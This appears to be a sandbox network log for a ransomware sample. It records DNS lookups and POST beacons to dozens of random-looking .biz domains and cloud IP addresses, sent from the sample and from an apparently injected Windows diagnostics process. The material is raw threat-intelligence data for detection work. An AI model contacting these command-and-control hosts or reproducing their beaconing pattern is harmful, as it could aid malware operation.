
http://sewlqwcd.biz/wxqrepjouowdlosl

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

3.237.86.197:80

Request

POST /wxqrepjouowdlosl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sewlqwcd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0a958b5734f098e5c690ff431d66371f|191.101.209.39|1717923893|1717923893|0|1|0; path=/; domain=.sewlqwcd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jlqltsjvh.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

jlqltsjvh.biz

IN A

Response

jlqltsjvh.biz

IN A

18.141.10.107
POST

http://jlqltsjvh.biz/gdqigngssjsdj

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

18.141.10.107:80

Request

POST /gdqigngssjsdj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jlqltsjvh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c948a7dab307676df0bee690f79dd2f0|191.101.209.39|1717923894|1717923894|0|1|0; path=/; domain=.jlqltsjvh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

dyjdrp.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

dyjdrp.biz

IN A

Response

dyjdrp.biz

IN A

54.244.188.177
DNS

dyjdrp.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

dyjdrp.biz

IN A

Response

dyjdrp.biz

IN A

54.244.188.177
POST

http://dyjdrp.biz/nklneifcvweg

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.244.188.177:80

Request

POST /nklneifcvweg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dyjdrp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=af2a41dc85311f346fb9a9e9b9d22399|191.101.209.39|1717923893|1717923893|0|1|0; path=/; domain=.dyjdrp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

napws.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

napws.biz

IN A

Response

napws.biz

IN A

35.164.78.200
POST

http://napws.biz/mqnkimt

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

35.164.78.200:80

Request

POST /mqnkimt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: napws.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=37b689130f07e2f643d551198c8a0822|191.101.209.39|1717923894|1717923894|0|1|0; path=/; domain=.napws.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

qvuhsaqa.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

qvuhsaqa.biz

IN A

Response

qvuhsaqa.biz

IN A

54.244.188.177
DNS

qvuhsaqa.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

qvuhsaqa.biz

IN A

Response

qvuhsaqa.biz

IN A

54.244.188.177
POST

http://qvuhsaqa.biz/nnovsrxy

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.244.188.177:80

Request

POST /nnovsrxy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qvuhsaqa.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=170d141a6baa984f7a5552ace08d4178|191.101.209.39|1717923894|1717923894|0|1|0; path=/; domain=.qvuhsaqa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

xyrgy.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

xyrgy.biz

IN A

Response

xyrgy.biz

IN A

54.80.154.23
POST

http://xyrgy.biz/lfl

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

54.80.154.23:80

Request

POST /lfl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xyrgy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=314a1336274e3a6bc22524856d061b19|191.101.209.39|1717923894|1717923894|0|1|0; path=/; domain=.xyrgy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

htwqzczce.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

htwqzczce.biz

IN A

Response

htwqzczce.biz

IN A

44.208.124.139

htwqzczce.biz

IN A

54.157.24.8

htwqzczce.biz

IN A

34.193.97.35
DNS

htwqzczce.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

htwqzczce.biz

IN A

Response

htwqzczce.biz

IN A

34.193.97.35

htwqzczce.biz

IN A

54.157.24.8

htwqzczce.biz

IN A

44.208.124.139
POST

http://htwqzczce.biz/qqeorfjsqwbjca

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

44.208.124.139:80

Request

POST /qqeorfjsqwbjca HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: htwqzczce.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920
DNS

apzzls.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

apzzls.biz

IN A

Response

apzzls.biz

IN A

34.211.97.45
POST

http://apzzls.biz/tbxr

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

34.211.97.45:80

Request

POST /tbxr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: apzzls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=cd3f73662eb9dc535b44ea323ae5281c|191.101.209.39|1717923895|1717923895|0|1|0; path=/; domain=.apzzls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

krnsmlmvd.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

krnsmlmvd.biz

IN A

Response

krnsmlmvd.biz

IN A

34.218.204.173
DNS

krnsmlmvd.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

krnsmlmvd.biz

IN A

Response

krnsmlmvd.biz

IN A

34.218.204.173
POST

http://krnsmlmvd.biz/kbckoukfijblgsec

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

34.218.204.173:80

Request

POST /kbckoukfijblgsec HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: krnsmlmvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=70d75586605b8cfd9785106a6210e7b3|191.101.209.39|1717923895|1717923895|0|1|0; path=/; domain=.krnsmlmvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

nlscndwp.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

nlscndwp.biz

IN A

Response

nlscndwp.biz

IN A

54.244.188.177
POST

http://nlscndwp.biz/qplhyryrxcqn

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.244.188.177:80

Request

POST /qplhyryrxcqn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: nlscndwp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=503706d3d29cc856c707b7daa84c68a0|191.101.209.39|1717923896|1717923896|0|1|0; path=/; domain=.nlscndwp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

bzkysubds.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

bzkysubds.biz

IN A

Response

bzkysubds.biz

IN A

3.94.10.34
POST

http://bzkysubds.biz/wdnddwn

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

3.94.10.34:80

Request

POST /wdnddwn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bzkysubds.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6ecb520562ebaaea0aabb2010640de44|191.101.209.39|1717923896|1717923896|0|1|0; path=/; domain=.bzkysubds.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ltpqsnu.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

ltpqsnu.biz

IN A

Response

ltpqsnu.biz

IN A

54.80.154.23
POST

http://ltpqsnu.biz/vbkgmicjwtiswov

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.80.154.23:80

Request

POST /vbkgmicjwtiswov HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ltpqsnu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1e6f3e17ebcd13f54b92e514429eafdd|191.101.209.39|1717923896|1717923896|0|1|0; path=/; domain=.ltpqsnu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

vnvbt.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

vnvbt.biz

IN A

Response

vnvbt.biz

IN A

44.213.104.86
DNS

vnvbt.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

vnvbt.biz

IN A

Response

vnvbt.biz

IN A

44.213.104.86
POST

http://vnvbt.biz/xsoonblv

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.213.104.86:80

Request

POST /xsoonblv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vnvbt.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=973c283320713b678411dd3009cb276c|191.101.209.39|1717923897|1717923897|0|1|0; path=/; domain=.vnvbt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ypituyqsq.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

ypituyqsq.biz

IN A

Response

ypituyqsq.biz

IN A

3.94.10.34
POST

http://ypituyqsq.biz/wplywmhlgcnwyloq

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

3.94.10.34:80

Request

POST /wplywmhlgcnwyloq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ypituyqsq.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=60ee139704af90c101283506a1bfbc55|191.101.209.39|1717923897|1717923897|0|1|0; path=/; domain=.ypituyqsq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ijnmvqa.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

ijnmvqa.biz

IN A

Response

ijnmvqa.biz

IN A

35.164.78.200
POST

http://ijnmvqa.biz/sthyqxt

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

35.164.78.200:80

Request

POST /sthyqxt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ijnmvqa.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4c4024c111730dbb9e2dc30c88adbbf8|191.101.209.39|1717923897|1717923897|0|1|0; path=/; domain=.ijnmvqa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

tltxn.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

tltxn.biz

IN A

Response

tltxn.biz

IN A

54.80.154.23
POST

http://tltxn.biz/xi

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.80.154.23:80

Request

POST /xi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tltxn.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=405f8d46f769a3ea60e2d28d2a74d142|191.101.209.39|1717923897|1717923897|0|1|0; path=/; domain=.tltxn.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

vgypotwp.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

vgypotwp.biz

IN A

Response

vgypotwp.biz

IN A

54.244.188.177
POST

http://htwqzczce.biz/dtjumbugioqybg

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

44.208.124.139:80

Request

POST /dtjumbugioqybg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: htwqzczce.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920
POST

http://vgypotwp.biz/dtjumbugioqybg

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.244.188.177:80

Request

POST /dtjumbugioqybg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vgypotwp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d520b3cf60fe6368bc0ce39189155fef|191.101.209.39|1717923898|1717923898|0|1|0; path=/; domain=.vgypotwp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

kvbjaur.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

kvbjaur.biz

IN A

Response

kvbjaur.biz

IN A

54.244.188.177
POST

http://kvbjaur.biz/rxecg

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

54.244.188.177:80

Request

POST /rxecg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: kvbjaur.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a6bc90a3efa38d6f7224b18b90bd0ac6|191.101.209.39|1717923899|1717923899|0|1|0; path=/; domain=.kvbjaur.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

giliplg.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

giliplg.biz

IN A

Response

giliplg.biz

IN A

44.213.104.86
DNS

giliplg.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

giliplg.biz

IN A

Response

giliplg.biz

IN A

44.213.104.86
POST

http://giliplg.biz/fqkgpgspqwvdkd

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.213.104.86:80

Request

POST /fqkgpgspqwvdkd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: giliplg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f68caa147297938da112da8256ceaaa4|191.101.209.39|1717923898|1717923898|0|1|0; path=/; domain=.giliplg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

pywolwnvd.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

pywolwnvd.biz

IN A

Response

pywolwnvd.biz

IN A

54.244.188.177
POST

http://pywolwnvd.biz/snfnq

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.244.188.177:80

Request

POST /snfnq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8a49e473ad3388ce607b9b7bb710080d|191.101.209.39|1717923899|1717923899|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ssbzmoy.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

ssbzmoy.biz

IN A

Response

ssbzmoy.biz

IN A

18.141.10.107
POST

http://ssbzmoy.biz/ku

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

18.141.10.107:80

Request

POST /ku HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:05:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8b210418cff84ce6a0a4dfcd94a274d0|191.101.209.39|1717923900|1717923900|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

uphca.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

uphca.biz

IN A

Response

uphca.biz

IN A

44.221.84.105
POST

http://uphca.biz/lqk

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

44.221.84.105:80

Request

POST /lqk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uphca.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=30ed2e0da7093b97af8dc6ffab0643ac|191.101.209.39|1717923899|1717923899|0|1|0; path=/; domain=.uphca.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

fjumtfnz.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

fjumtfnz.biz

IN A

Response

fjumtfnz.biz

IN A

34.211.97.45
POST

http://fjumtfnz.biz/qddyfatykrhmox

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

34.211.97.45:80

Request

POST /qddyfatykrhmox HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fjumtfnz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:05:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
